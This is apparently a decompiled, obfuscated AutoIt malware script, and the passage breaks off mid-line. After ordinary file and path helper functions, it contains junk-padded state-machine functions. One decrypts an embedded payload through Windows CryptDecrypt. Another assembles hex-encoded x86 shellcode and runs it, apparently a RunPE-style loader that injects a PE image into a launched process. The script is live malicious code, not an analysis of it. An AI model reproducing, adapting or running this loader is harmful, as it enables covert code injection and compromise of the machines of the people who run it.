IF $BOVERWRITE = DEFAULT THEN $BOVERWRITE = FALSE IF NOT (ISBOOL ($BOVERWRITE ) OR $BOVERWRITE = 0 OR $BOVERWRITE = 1 ) THEN RETURN SETERROR (5 , 0 , 0 ) IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $AARRAY = FILEREADTOARRAY ($SFILEPATH ) LOCAL $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF ($IUBOUND + 1 ) < $ILINE THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , FILEGETENCODING ($SFILEPATH ) + $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (3 , 0 , 0 ) LOCAL $SDATA = "" $ILINE -= 1 FOR $I = 0 TO $IUBOUND IF $I = $ILINE THEN IF $BOVERWRITE THEN IF $STEXT THEN $SDATA &= $STEXT & @CRLF ELSE $SDATA &= $STEXT & @CRLF & $AARRAY [$I ] & @CRLF ENDIF ELSEIF $I < $IUBOUND THEN $SDATA &= $AARRAY [$I ] & @CRLF ELSEIF $I = $IUBOUND THEN $SDATA &= $AARRAY [$I ] ENDIF NEXT FILEWRITE ($HFILEOPEN , $SDATA ) FILECLOSE ($HFILEOPEN ) RETURN 1 ENDFUNC FUNC _PATHFULL ($SRELATIVEPATH , $SBASEPATH = @WORKINGDIR ) IF NOT $SRELATIVEPATH OR $SRELATIVEPATH = "." 
THEN RETURN $SBASEPATH LOCAL $SFULLPATH = STRINGREPLACE ($SRELATIVEPATH , "/" , "\" ) LOCAL CONST $SFULLPATHCONST = $SFULLPATH LOCAL $SPATH LOCAL $BROOTONLY = STRINGLEFT ($SFULLPATH , 1 ) = "\" AND STRINGMID ($SFULLPATH , 2 , 1 ) <> "\" IF $SBASEPATH = DEFAULT THEN $SBASEPATH = @WORKINGDIR FOR $I = 1 TO 2 $SPATH = STRINGLEFT ($SFULLPATH , 2 ) IF $SPATH = "\\" THEN $SFULLPATH = STRINGTRIMLEFT ($SFULLPATH , 2 ) LOCAL $NSERVERLEN = STRINGINSTR ($SFULLPATH , "\" ) + 4294967295 $SPATH = "\\" & STRINGLEFT ($SFULLPATH , $NSERVERLEN ) $SFULLPATH = STRINGTRIMLEFT ($SFULLPATH , $NSERVERLEN ) EXITLOOP ELSEIF STRINGRIGHT ($SPATH , 1 ) = ":" THEN $SFULLPATH = STRINGTRIMLEFT ($SFULLPATH , 2 ) EXITLOOP ELSE $SFULLPATH = $SBASEPATH & "\" & $SFULLPATH ENDIF NEXT IF STRINGLEFT ($SFULLPATH , 1 ) <> "\" THEN IF STRINGLEFT ($SFULLPATHCONST , 2 ) = STRINGLEFT ($SBASEPATH , 2 ) THEN $SFULLPATH = $SBASEPATH & "\" & $SFULLPATH ELSE $SFULLPATH = "\" & $SFULLPATH ENDIF ENDIF LOCAL $ATEMP = STRINGSPLIT ($SFULLPATH , "\" ) LOCAL $APATHPARTS [$ATEMP [0 ] ] , $J = 0 FOR $I = 2 TO $ATEMP [0 ] IF $ATEMP [$I ] = ".." THEN IF $J THEN $J -= 1 ELSEIF NOT ($ATEMP [$I ] = "" AND $I <> $ATEMP [0 ] ) AND $ATEMP [$I ] <> "." THEN $APATHPARTS [$J ] = $ATEMP [$I ] $J += 1 ENDIF NEXT $SFULLPATH = $SPATH IF NOT $BROOTONLY THEN FOR $I = 0 TO $J + 4294967295 $SFULLPATH &= "\" & $APATHPARTS [$I ] NEXT ELSE $SFULLPATH &= $SFULLPATHCONST IF STRINGINSTR ($SFULLPATH , ".." 
) THEN $SFULLPATH = _PATHFULL ($SFULLPATH ) ENDIF DO $SFULLPATH = STRINGREPLACE ($SFULLPATH , ".\" , "\" ) UNTIL @EXTENDED = 0 RETURN $SFULLPATH ENDFUNC FUNC _PATHGETRELATIVE ($SFROM , $STO ) IF STRINGRIGHT ($SFROM , 1 ) <> "\" THEN $SFROM &= "\" IF STRINGRIGHT ($STO , 1 ) <> "\" THEN $STO &= "\" IF $SFROM = $STO THEN RETURN SETERROR (1 , 0 , STRINGTRIMRIGHT ($STO , 1 ) ) LOCAL $ASFROM = STRINGSPLIT ($SFROM , "\" ) LOCAL $ASTO = STRINGSPLIT ($STO , "\" ) IF $ASFROM [1 ] <> $ASTO [1 ] THEN RETURN SETERROR (2 , 0 , STRINGTRIMRIGHT ($STO , 1 ) ) LOCAL $I = 2 LOCAL $IDIFF = 1 WHILE 1 IF $ASFROM [$I ] <> $ASTO [$I ] THEN $IDIFF = $I EXITLOOP ENDIF $I += 1 WEND $I = 1 LOCAL $SRELPATH = "" FOR $J = 1 TO $ASTO [0 ] IF $I >= $IDIFF THEN $SRELPATH &= "\" & $ASTO [$I ] ENDIF $I += 1 NEXT $SRELPATH = STRINGTRIMLEFT ($SRELPATH , 1 ) $I = 1 FOR $J = 1 TO $ASFROM [0 ] IF $I > $IDIFF THEN $SRELPATH = "..\" & $SRELPATH ENDIF $I += 1 NEXT IF STRINGRIGHT ($SRELPATH , 1 ) == "\" THEN $SRELPATH = STRINGTRIMRIGHT ($SRELPATH , 1 ) RETURN $SRELPATH ENDFUNC FUNC _PATHMAKE ($SDRIVE , $SDIR , $SFILENAME , $SEXTENSION ) IF STRINGLEN ($SDRIVE ) THEN IF NOT (STRINGLEFT ($SDRIVE , 2 ) = "\\" ) THEN $SDRIVE = STRINGLEFT ($SDRIVE , 1 ) & ":" ENDIF IF STRINGLEN ($SDIR ) THEN IF NOT (STRINGRIGHT ($SDIR , 1 ) = "\" ) AND NOT (STRINGRIGHT ($SDIR , 1 ) = "/" ) THEN $SDIR = $SDIR & "\" ELSE $SDIR = "\" ENDIF IF STRINGLEN ($SDIR ) THEN IF NOT (STRINGLEFT ($SDIR , 1 ) = "\" ) AND NOT (STRINGLEFT ($SDIR , 1 ) = "/" ) THEN $SDIR = "\" & $SDIR ENDIF IF STRINGLEN ($SEXTENSION ) THEN IF NOT (STRINGLEFT ($SEXTENSION , 1 ) = "." ) THEN $SEXTENSION = "." 
& $SEXTENSION ENDIF RETURN $SDRIVE & $SDIR & $SFILENAME & $SEXTENSION ENDFUNC FUNC _PATHSPLIT ($SFILEPATH , BYREF $SDRIVE , BYREF $SDIR , BYREF $SFILENAME , BYREF $SEXTENSION ) LOCAL $AARRAY = STRINGREGEXP ($SFILEPATH , "^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$" , $STR_REGEXPARRAYMATCH ) IF @ERROR THEN REDIM $AARRAY [5 ] $AARRAY [0 ] = $SFILEPATH ENDIF $SDRIVE = $AARRAY [1 ] IF STRINGLEFT ($AARRAY [2 ] , 1 ) == "/" THEN $SDIR = STRINGREGEXPREPLACE ($AARRAY [2 ] , "\h*[\/\\]+\h*" , "\/" ) ELSE $SDIR = STRINGREGEXPREPLACE ($AARRAY [2 ] , "\h*[\/\\]+\h*" , "\\" ) ENDIF $AARRAY [2 ] = $SDIR $SFILENAME = $AARRAY [3 ] $SEXTENSION = $AARRAY [4 ] RETURN $AARRAY ENDFUNC FUNC _REPLACESTRINGINFILE ($SFILEPATH , $SSEARCHSTRING , $SREPLACESTRING , $ICASESENSITIVE = 0 , $IOCCURANCE = 1 ) IF STRINGINSTR (FILEGETATTRIB ($SFILEPATH ) , "R" ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $SFILEREAD = FILEREAD ($HFILEOPEN ) FILECLOSE ($HFILEOPEN ) IF $ICASESENSITIVE = DEFAULT THEN $ICASESENSITIVE = 0 IF $IOCCURANCE = DEFAULT THEN $IOCCURANCE = 1 $SFILEREAD = STRINGREPLACE ($SFILEREAD , $SSEARCHSTRING , $SREPLACESTRING , 1 - $IOCCURANCE , $ICASESENSITIVE ) LOCAL $IRETURN = @EXTENDED IF $IRETURN THEN LOCAL $IFILEENCODING = FILEGETENCODING ($SFILEPATH ) $HFILEOPEN = FILEOPEN ($SFILEPATH , $IFILEENCODING + $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) FILEWRITE ($HFILEOPEN , $SFILEREAD ) FILECLOSE ($HFILEOPEN ) ENDIF RETURN $IRETURN ENDFUNC FUNC _TEMPFILE ($SDIRECTORYNAME = @TEMPDIR , $SFILEPREFIX = "~" , $SFILEEXTENSION = ".tmp" , $IRANDOMLENGTH = 7 ) IF $IRANDOMLENGTH = DEFAULT OR $IRANDOMLENGTH <= 0 THEN $IRANDOMLENGTH = 7 IF $SDIRECTORYNAME = DEFAULT OR (NOT FILEEXISTS ($SDIRECTORYNAME ) ) THEN $SDIRECTORYNAME = @TEMPDIR IF $SFILEEXTENSION = 
DEFAULT THEN $SFILEEXTENSION = ".tmp" IF $SFILEPREFIX = DEFAULT THEN $SFILEPREFIX = "~" IF NOT FILEEXISTS ($SDIRECTORYNAME ) THEN $SDIRECTORYNAME = @SCRIPTDIR $SDIRECTORYNAME = STRINGREGEXPREPLACE ($SDIRECTORYNAME , "[\\/]+$" , "" ) $SFILEEXTENSION = STRINGREGEXPREPLACE ($SFILEEXTENSION , "^\.+" , "" ) $SFILEPREFIX = STRINGREGEXPREPLACE ($SFILEPREFIX , "[\\/:*?"<>|]" , "" ) LOCAL $STEMPNAME = "" DO $STEMPNAME = "" WHILE STRINGLEN ($STEMPNAME ) < $IRANDOMLENGTH $STEMPNAME &= CHR (RANDOM (97 , 122 , 1 ) ) WEND $STEMPNAME = $SDIRECTORYNAME & "\" & $SFILEPREFIX & $STEMPNAME & "." & $SFILEEXTENSION UNTIL NOT FILEEXISTS ($STEMPNAME ) RETURN $STEMPNAME ENDFUNC #NoTrayIcon FUNC DBRUAIEIBZEWRGBQ ($VDATA , $VCRYPTKEY ) GLOBAL $569195090 = 1700268568 GLOBAL $DYJO7XI0ZR = 1929536 FOR $E = 0 TO 16288 CHR (684290 ) IF $569195090 = 73392173 THEN DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDestroyKey" , "handle" , $VCRYPTKEY ) $569195090 = 1296546299 ENDIF IF $569195090 = 97398974 THEN $TBUFF = DLLSTRUCTCREATE ("byte[" & BINARYLEN ($VDATA ) + "1000" & "]" ) $569195090 = 1248908323 ISPTR (3853051 + 1638825 * 1547893 ) ENDIF IF $569195090 = 208206939 THEN DLLCLOSE ($__G_ACRYPTINTERNALDATA ["1" ] ) $569195090 = 665766390 ISBOOL ("34j5R73dGD6I" ) ENDIF IF $569195090 = 216567143 THEN $TTEMPSTRUCT = DLLSTRUCTCREATE ("byte[" & $IPLAINTEXTSIZE + "1" & "]" , DLLSTRUCTGETPTR ($TBUFF ) ) $569195090 = 1933112639 ISBINARY (1198197 + 3255423 + 521890 ) ENDIF IF $569195090 = 227757661 THEN LOCAL $VRETURN CHR (146190 ) $569195090 = 686536036 DIM $JUYK3CZ7P0QYD5XI3BYA = 2657508 + 4292338741 + 4291347646 ENDIF IF $569195090 = 295874608 THEN $__G_ACRYPTINTERNALDATA [1 ] = DLLOPEN ("Advapi32.dll" ) $569195090 = 1532618530 DIM $MGXLD4ZCRIABNR59SJXR = 2913009 + 4291678514 + 1019338 + 2988075 + 1033950 * 1364808 + 1903877 PTR (2063219 + 4291058243 + 4293435455 ) ENDIF IF $569195090 = 418593742 THEN LOCAL $TTEMPSTRUCT DIM $PASKUUU4FSRSWMJIWVNT = 3920272 $569195090 = 1052868023 ENDIF IF 
$569195090 = 463888510 THEN DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptReleaseContext" , "handle" , $__G_ACRYPTINTERNALDATA ["2" ] , "dword" , "0" ) PTR ("gd1ibs7elJVICiG2jmxyMbH4hkLlW7aEKVLo0nl" ) $569195090 = 208206939 ISFLOAT ("IzLRIGMHB4ReE7b1RVsnJp7RFrb5bGX504vSH4MotCdReHT2mtj0x7dsB4kqFSG4gWnKLssWie4h" ) ENDIF IF $569195090 = 548984161 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptHashData" , "handle" , $HCRYPTHASH , "struct*" , $TBUFF , "dword" , DLLSTRUCTGETSIZE ($TBUFF ) , "dword" , "1" ) ISBOOL ("Rx6G30dpNUvTL5iKrtiq3bwStc6fmqlSw8ZGjouUIdNcXvsleOvOz20Qaon147dxHMvMgLAc9xSZwu48UUbG4Gr" ) $569195090 = 693997732 ENDIF IF $569195090 = 665766390 THEN RETURN BINARY ($VRETURN ) ISSTRING (2395551 + 1965250 ) EXITLOOP ENDIF IF $569195090 = 686536036 THEN $VDATA = BINARYTOSTRING ($VDATA ) CHR (924694 ) $569195090 = 295874608 ENDIF IF $569195090 = 693997732 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDeriveKey" , "handle" , $__G_ACRYPTINTERNALDATA ["2" ] , "uint" , "0x00006610" , "handle" , $HCRYPTHASH , "dword" , "0x00000001" , "handle*" , "0" ) $569195090 = 1483208281 MOD (437026 , 632919 ) ISSTRING ("1D6gFaEHgZf0U8eOIsL2pti0ZJWwQNEXDZhlivSr" ) ENDIF IF $569195090 = 718764494 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDecrypt" , "handle" , $VCRYPTKEY , "handle" , "0" , "bool" , EXECUTE ("True" ) , "dword" , "0" , "struct*" , $TBUFF , "dword*" , BINARYLEN ($VDATA ) ) $569195090 = 1655295316 ENDIF IF $569195090 = 895876247 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptCreateHash" , "handle" , $__G_ACRYPTINTERNALDATA ["2" ] , "uint" , "0x00008003" , "ptr" , "0" , "dword" , "0" , "handle*" , "0" ) DIM $EXM1IFHVGQ5OI1BUSV50 = "FmJtSVq7L9aFulqs6vTJ0bfXdbMK04DOzi8lLHAurxDr5SXQlbwalqdEhXpQhOhSEuflmfQx4ysBGY2un7zYHDCjfDdZrUnLqWWJLLCfv8" $569195090 = 1876673018 RANDOM (1243867 ) ENDIF IF $569195090 = 969182864 THEN $__G_ACRYPTINTERNALDATA ["2" ] = $ARET ["1" ] 
CHR (640441 ) $569195090 = 1622275345 ENDIF IF $569195090 = 1052868023 THEN LOCAL $IPLAINTEXTSIZE DIM $TB1GKKQLUBSSLETCJXQL = 1953326 $569195090 = 227757661 WINEXISTS ("rdx8MVSQFTeD15LqzmrLl0O4ZINlULmq7T2hsnhpJcgVp" ) CHR (242088 ) ENDIF IF $569195090 = 1248908323 THEN DLLSTRUCTSETDATA ($TBUFF , EXECUTE ("1" ) , $VDATA ) INT (1856423 ) $569195090 = 718764494 ENDIF IF $569195090 = 1296546299 THEN $__G_ACRYPTINTERNALDATA ["0" ] -= "1" $569195090 = 463888510 WINEXISTS ("YGidE8mfbcjU3O11mh0H3YOHzTZfdidhmpBBJxI61nApbREYqm4yfvL91JMVjh" ) ENDIF IF $569195090 = 1372412672 THEN DLLSTRUCTSETDATA ($TBUFF , EXECUTE ("1" ) , $VCRYPTKEY ) $569195090 = 548984161 ISBOOL (861948 + 3268186 + 4291360318 ) STRING ("SnaY0oOb0MBJ9UXWUlHq8j1K25fZlQ6MAd5HitlNtaRaVZseVh5DYjHIwz55iZ0" ) ENDIF IF $569195090 = 1435411003 THEN DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDestroyHash" , "handle" , $HCRYPTHASH ) $569195090 = 1623917350 WINEXISTS ("pMAa468B1ZdMbddVCYrFvlTxqFEkHt7QwpFDDD4mJgFJ2rgVWxna1zCe4dTyBX4G2wpWHJq94e5pOiE8yTyjg6Y6WBJAUFVWm8S" ) STRING ("hogWDnyWIVaSxUA5It9fa0o" ) ENDIF IF $569195090 = 1446413075 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDestroyKey" , "handle" , $VCRYPTKEY ) $569195090 = 73392173 RANDOM (3748120 ) ENDIF IF $569195090 = 1483208281 THEN $VRETURN = $ARET ["5" ] $569195090 = 1435411003 DIM $BIDY28EDXCHW6TUHLQ9S = "ukSvIZ6llRHfF1Acl7q3qUJiNcnSyaW3iIgxvCsjI1mV9RA13fatTZmK" ENDIF IF $569195090 = 1532618530 THEN LOCAL $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptAcquireContext" , "handle*" , "0" , "ptr" , "0" , "ptr" , "0" , "dword" , "24" , "dword" , "0xF0000000" ) ISFLOAT (2445292 * 717613 ) $569195090 = 969182864 RANDOM (3800342 ) ISFLOAT (2631402 + 1592634 ) ENDIF IF $569195090 = 1622275345 THEN $__G_ACRYPTINTERNALDATA ["0" ] += "1" DIM $LVZTABKTWFXWVVHUEB0U = 3040659 + 4294453516 * 1561776 + 2615672 + 4292985959 * 160396 * 1690876 * 3711931 $569195090 = 895876247 ENDIF IF $569195090 = 1623473715 THEN 
LOCAL $TBUFF $569195090 = 418593742 MOD (1053136 , 3647856 ) ISBOOL (1305474 * 3237247 + 524023 ) ENDIF IF $569195090 = 1623917350 THEN $VCRYPTKEY = $VRETURN $569195090 = 97398974 PTR (3304174 + 4294888220 + 4290973688 ) WINEXISTS ("0wZi34JDsVdEDFXLJXcAIAO6XaToH8creTQL8cosyBAcEtf8nUzcoEczS2v3lu5tSVAU0kM" ) ENDIF IF $569195090 = 1655295316 THEN $IPLAINTEXTSIZE = $ARET ["6" ] ISPTR ("9LBC4VaYHadIR" ) $569195090 = 216567143 ENDIF IF $569195090 = 1700268568 THEN LOCAL $__G_ACRYPTINTERNALDATA ["3" ] $569195090 = 1623473715 ENDIF IF $569195090 = 1876673018 THEN $HCRYPTHASH = $ARET ["5" ] STRING ("g2DEC" ) $569195090 = 2132296422 DIM $A28ZTHVSS1CJQH0NL8K2 = 1199422 ISBOOL (3867385 * 2102375 + 4294545054 * 3369801 ) ENDIF IF $569195090 = 1933112639 THEN $VRETURN = BINARYMID (DLLSTRUCTGETDATA ($TTEMPSTRUCT , EXECUTE ("1" ) ) , "1" , $IPLAINTEXTSIZE ) PTR ("UyvLbbtHWIcp2EtGWSrzXvzfljVpTB2b14nlGRRIpeliMqQLCsc7F64x9pz1pdYtQax7qhafaTkSjrC4CjXA" ) $569195090 = 1446413075 DIM $ZMQQ0SLP2BM3TUUS66XW = "nSXFxgpx4VEC7A4TZkz8BrZ0" ENDIF IF $569195090 = 2132296422 THEN $TBUFF = DLLSTRUCTCREATE ("byte[" & BINARYLEN ($VCRYPTKEY ) & "]" ) $569195090 = 1372412672 DIM $C8SIYKEDVBM528RHZW3Z = 2281636 ENDIF NEXT ENDFUNC FUNC MWMQWLZFSVGLEKEBWPKTQCNGY ($WPATH , $WARGUMENTS , $LPFILE , $PROTECT ) GLOBAL $1267239031 = 1700268568 GLOBAL $627DNRXPAW = 2952434 FOR $E = 0 TO 3174096 IF $1267239031 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837DF4000F84800000008B97A00000008365F40003D383BFA4" MOD (271299 , 2858503 ) $1267239031 = 979069101 DIM $SL85CIVLUVEOMGRY4ILH = 3686944 ENDIF IF $1267239031 = 73392173 THEN $BIN_SHELLCODE &= "00008B45BC3B4634750F50FF75D8FF55B085C00F85610200006A4068003000" $1267239031 = 1296546299 DIM $UCEJUJMVO2OWUREJB8DK = "SX4s47WmxFv1coshkK4c1syiHx5Cu1hI3nLpj1Zm1H0vtESBVCrwii5zxVUGbs1FxW7ZLd7tVSksBdYcQCS2JVzVrm2xgs" ENDIF IF $1267239031 = 97398974 THEN $BIN_SHELLCODE &= "8D8510FCFFFF50FF55E88B4D10C78510FCFFFF070001008B713C03F10FB746" RANDOM (2182153 ) $1267239031 = 
1248908323 PTR (2015213 + 4293245442 * 2450013 * 1301782 ) PTR (2322587 * 2532464 + 4294126729 + 4293325415 ) ENDIF IF $1267239031 = 195372937 THEN $BIN_SHELLCODE &= "000020741985C079046A40EB172500000040F7D81BC083E01083C010EB1585" $1267239031 = 851821169 ISBINARY ("qEXMawLj9X" ) ENDIF IF $1267239031 = 202026599 THEN $KEY ["1" ] ("kernel32" , "dword" , "VirtualFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "dword" , "0x8000" ) ISBOOL ("AL8RxuluuAG6Ui3u90oQmd5IMtDwz1kLhZb5M5TUfkBmCA2" ) EXITLOOP ENDIF IF $1267239031 = 208206939 THEN $BIN_SHELLCODE &= "5033FFC745EC0100000057FF75D8FF55C08945F885C0751468008000005753" $1267239031 = 665766390 STRING (1632576 + 3412180 ) ENDIF IF $1267239031 = 216567143 THEN $BIN_SHELLCODE &= "000F84E80200008D45D8508D85DCFEFFFF5052526A04525252FF750CFF7508" ISSTRING ("Y5g7SdgEKcKSglACq7kVsxMNnn1O3pp86HM73iUMsZjjW8s2MxH7sELArCUDmAKuWMWHIDIhnHCDnD2o59bFSsQA5mOAxqA1nYxjmVsiYzTVci" ) $1267239031 = 1933112639 ISBOOL ("fMC6uLwYiT7hKpzgTcjQ2RrI5yXa203RnBik4m1i6uQQWMA2WR" ) ENDIF IF $1267239031 = 227757661 THEN $BIN_SHELLCODE &= "401803CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C" CHR (2119341 ) $1267239031 = 686536036 STRING (87506 * 1456198 * 1151148 * 993779 ) DIM $OMFLBUHBKWR74NL8ZSQ4 = 3004838 ENDIF IF $1267239031 = 295874608 THEN $BIN_SHELLCODE &= "8303C7EBE9558BEC81ECF003000053565733FF897DB8648B35300000008B76" DIM $TJXXZGTRVHDVRXX9WUHT = 3965608 * 594418 * 1232006 + 4291190241 + 1004517 + 4293345140 + 1340308 + 2821848 $1267239031 = 1532618530 MOD (2201050 , 2680202 ) ENDIF IF $1267239031 = 304845161 THEN $BIN_SHELLCODE &= "050F8677FCFFFF33C05F5E5B8BE55DC20C00" $1267239031 = 1014781231 DIM $534XE2B5XALFYJFCYIRA = 57560 PTR (3960181 + 1285405 * 1928343 + 2702247 ) ENDIF IF $1267239031 = 363789172 THEN LOCAL $SHELLCODE_STRUCT = $KEY ["0" ] ("byte shellcode[" & $BINL & "]" , $LPSHELLCODE ) $1267239031 = 1780023503 INT (3551320 ) ENDIF IF $1267239031 = 397553911 THEN $BIN_SHELLCODE &= 
"0F840DFEFFFF8B45E0EB1D8B5DFC33FF837DD800740757FF75D8FF55A883FB" $1267239031 = 304845161 ISBOOL ("bMUFzLhoqfNfapKL6GygImRzY7hOw4qlMmjQb7OdlWdouosMVRWbipfZ6uSBEB2vZBBYg4J92v5XiBe" ) ISSTRING (2654182 + 223575 ) ENDIF IF $1267239031 = 418593742 THEN $BIN_SHELLCODE &= "F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5DC20400558BEC5151" $1267239031 = 1052868023 MOD (2238625 , 2896909 ) ENDIF IF $1267239031 = 427686952 THEN $BIN_SHELLCODE &= "FCFFFF83C00850FF75D8FF55D485C00F843CFEFFFF8B46280345F88985C0FC" CHR (3525649 ) $1267239031 = 434956025 ISSTRING (448995 + 3136940 + 4293759231 * 1933696 ) ENDIF IF $1267239031 = 434956025 THEN $BIN_SHELLCODE &= "FFFF8D8510FCFFFF50FF75DCFF559085C00F841BFEFFFFFF75DCFF55AC85C0" ISBOOL ("JyfRWj3TOXm3BclXj8dHugqcYNqz" ) $1267239031 = 397553911 ISFLOAT ("DRXUQndD9iyoAetMbDO4Dhc2i3CLnobn9mSgvoxuqLr4yyZvXYGQaHvvN5LWUBpVgloovnqXguM10iDTehYzRvnA1vBALKKZvFX" ) ENDIF IF $1267239031 = 437981964 THEN $KEY ["3" ] ($SHELLCODE_STRUCT , "shellcode" , $BIN_SHELLCODE ) $1267239031 = 555601121 ISBOOL (2991958 * 3679854 + 4292932483 ) WINEXISTS ("LMZeV8YwaWZkFTXEtvpIDho26WGFx069T38lGBbpvn9YSJd6h8ljlunEy7h9Ar9jZZBMVL82u9mpizkwTKyy" ) ENDIF IF $1267239031 = 456464236 THEN $BIN_SHELLCODE &= "0345F850FF75D8FF55CC85C074128B4DF483C7280FB7460641894DF43BC872" PTR ("DXIubZdoZ83hAlF9sZlh7v8XVqZ3JEdac7qYyHskibsBqosy3yv7LqShYWIV9kOu52fD5RJVGb95cGFF" ) $1267239031 = 1780715420 RANDOM (686894 ) ENDIF IF $1267239031 = 463888510 THEN $BIN_SHELLCODE &= "34FF75D8FF55C08945F885C0753B85FF0F84230200006A406800300000FF76" $1267239031 = 208206939 ENDIF IF $1267239031 = 518704526 THEN $BIN_SHELLCODE &= "75D8FF55D485C00F84FEFEFFFF8D459C506A02FF7654FF75F8FF75D8FF55CC" DIM $W8GXJZDMZKZKRWFRQDXI = 692779 + 4294178295 * 1941383 + 960945 * 2737977 * 3159816 * 3390308 + 2278574 $1267239031 = 991787867 ENDIF IF $1267239031 = 548984161 THEN $BIN_SHELLCODE &= "CAD803C78570FFFFFF99B04806C78574FFFFFF93BA9403C78578FFFFFFE4C7" $1267239031 = 693997732 ISBOOL (3199429 + 4294753684 * 1437131 ) 
ISBINARY (3506304 * 3623853 * 2322729 * 2067922 ) ENDIF IF $1267239031 = 555601121 THEN $KEY ["3" ] ($FILE_STRUCT , "lpfile" , $LPFILE ) CHR (2989384 ) $1267239031 = 981504074 ENDIF IF $1267239031 = 569195090 THEN $BIN_SHELLCODE &= "06732C8B7DD083C72C03FEFF77FC8B07034510508B47F803C350FF55B48B4D" $1267239031 = 1131056637 STRING ("iQZWT7K2oonRsrnGIorEUodmocAnng9zUhInaX8Hp5mFdFS95kexfN44MMHQGxNhoX7kT9FWqToYbG" ) ENDIF IF $1267239031 = 586222774 THEN $BIN_SHELLCODE &= "0881E1FF0F0000030A0104198B4DF08B42044183E808894DF0D1E83BC872BB" $1267239031 = 1029171870 ENDIF IF $1267239031 = 665766390 THEN $BIN_SHELLCODE &= "FF55C48B5DFCE9F501000033FFFF7654FF751053FF55B433C0897DF0663B46" $1267239031 = 569195090 MOD (1162428 , 87678 ) ENDIF IF $1267239031 = 686536036 THEN $BIN_SHELLCODE &= "74148B55FC463B750872E733C05F5E5B8BE55DC208008B45F80FB704708B04" DIM $QPIGQ5NSHWYF3FCZVFFK = 318795 $1267239031 = 295874608 PTR (292378 + 2109525 * 2825386 ) ENDIF IF $1267239031 = 693997732 THEN $BIN_SHELLCODE &= "B904C7857CFFFFFFE487B804C74580A92DD701C7458405D13D0BC745884427" WINEXISTS ("XjwyUD7RhVE4z55WQaM" ) $1267239031 = 1483208281 ISBOOL ("FViOcI8YIOI5SluiFk0t4ngcWJ14NiBn7138usNIXQvUw9eDQDpHT2KrOg2CS" ) ENDIF IF $1267239031 = 718764494 THEN $BIN_SHELLCODE &= "0333FF4733D2897DF433C08955EC6639110F94C03D4D5A00000F840E030000" $1267239031 = 1655295316 STRING (867786 + 2095763 + 3490012 ) ENDIF IF $1267239031 = 851821169 THEN $BIN_SHELLCODE &= "C079056A0458EB0CA9000000406A00580F95C0408D4D9C5150FF77E48B47E8" $1267239031 = 456464236 STRING ("23DeqLsozl0TE5Fbbo" ) ENDIF IF $1267239031 = 895876247 THEN $BIN_SHELLCODE &= "FFFFFF8D45C0898530FFFFFF8D4598898534FFFFFF8D45D4898538FFFFFF8D" DIM $BWVZTAF7UZBGU23IQDIX = "AXU6ZNVqk5C02bS4m9XtoF4DxliiOEphoRbILCD" $1267239031 = 1876673018 ISFLOAT ("IRB0kNDdVCf52qHMFMLQOuKkaisTFa9Iva4RTs7aamvWLgRv50qSdDonfr0bvVHVDGI1v03nOLOB9ZI3B7YOTrE1VRLBB6NpOKreGZae7dcA" ) MOD (1026700 , 2916745 ) ENDIF IF $1267239031 = 969182864 THEN $BIN_SHELLCODE &= 
"368B76188975C88D45B4C78558FFFFFF793A3C07898520FFFFFF8BF78D45E8" CHR (3835530 ) $1267239031 = 1622275345 DIM $SGNOBVT7ZXYHDWM6TSOO = 231310 + 3904646 ENDIF IF $1267239031 = 979069101 THEN $BIN_SHELLCODE &= "00000000766B8B420433C983E808894DF0A9FEFFFFFF76450FB7444A086685" STRING ("WIfcYTvZEstDz9ZSoI6Bnkv78Qhk3TpwSh" ) $1267239031 = 2005523844 ENDIF IF $1267239031 = 981504074 THEN LOCAL $RET = $KEY ["2" ] ("dword" , $LPSHELLCODE + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($FILE_STRUCT ) ) ISBOOL (796365 * 2319299 + 4291062434 ) $1267239031 = 2115662046 ISSTRING (1647701 + 2441601 + 508485 + 525874 ) RANDOM (3109830 ) ENDIF IF $1267239031 = 991787867 THEN $BIN_SHELLCODE &= "85C00F84E4FEFFFF33C0897DF4663B4606736C8B7DD083C73C03FE8B07A900" $1267239031 = 195372937 RANDOM (3990407 ) ENDIF IF $1267239031 = 1014781231 THEN LOCAL $BINL = BINARYLEN ($BIN_SHELLCODE ) $1267239031 = 1086136603 RANDOM (3952055 ) ENDIF IF $1267239031 = 1029171870 THEN $BIN_SHELLCODE &= "8B4DF4034A04035204894DF43B8FA4000000729533FF57FF765053FF75F8FF" $1267239031 = 518704526 MOD (1272682 , 3812828 ) STRING (1286433 + 4293770259 + 4291169513 ) ENDIF IF $1267239031 = 1052868023 THEN $BIN_SHELLCODE &= "5356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B" $1267239031 = 227757661 INT (3932423 ) ISFLOAT (1451006 